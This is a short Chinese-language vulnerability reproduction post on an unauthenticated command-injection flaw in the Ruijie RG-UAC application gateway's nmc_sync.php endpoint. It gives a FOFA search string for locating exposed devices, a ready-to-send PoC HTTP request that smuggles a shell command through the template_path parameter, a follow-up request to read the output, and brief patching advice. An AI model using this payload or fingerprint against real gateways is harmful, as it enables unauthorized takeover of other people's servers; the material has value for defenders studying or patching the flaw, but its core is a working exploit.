锐捷RG-UAC应用网关 前台RCE漏洞复现

0x01 产品简介

锐捷RG-UAC系列应用管理网关是锐捷自主研发的应用管理产品。

0x02 漏洞概述

锐捷RG-UAC应用管理网关 nmc_sync.php 接口处存在命令执行漏洞,未经身份认证的攻击者可执行任意命令控制服务器权限。

0x03 复现环境

FOFA:app="Ruijie-RG-UAC"

0x04 漏洞复现

PoC

复制代码
GET /view/systemConfig/management/nmc_sync.php?center_ip=127.0.0.1&template_path=|whoami%20>test.txt|cat HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip

验证

复制代码
GET /view/systemConfig/management/test.txt HTTP/1.1
Host: your-ip
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

0x05 修复建议

⼚商已发布了漏洞修复程序,请及时关注更新: https://www.ruijie.com.cn

通过防⽕墙等安全设备设置访问策略,设置⽩名单访问。

如⾮必要,禁⽌公⽹访问该系统。

相关推荐
上海云盾-高防顾问4 小时前
WAF防火墙:构筑Web应用安全的“隐形护盾”
安全
DPLSLAB64 小时前
从 SolarWinds 事件看 CCRC 认证的供应链安全价值
服务器·网络·安全
ASCO1100694 小时前
施工用电的基本原则与相关的安全规定
安全
ASCO1100694 小时前
安全用电基础知识及隐患排查重点
大数据·网络·安全
100分题库小程序4 小时前
道路运输安全员企业负责人考试内容与范围
安全
mingzhi615 小时前
绿盟二面面试题
android·web安全·渗透测试
AIGC方案6 小时前
免费下载 | 2025低空经济发展白皮书(3.0) - 安全体系
安全
暴躁的小胡!!!6 小时前
2025年最新总结安全基础(面试题)
网络·安全·web安全
FreeBuf_6 小时前
美国国土安全部终止资助,CVE漏洞数据库项目面临停摆危机
数据库·安全·web安全
白山云北诗6 小时前
游戏盾是什么?重新定义游戏安全边界
安全·游戏·游戏盾推荐·游戏攻击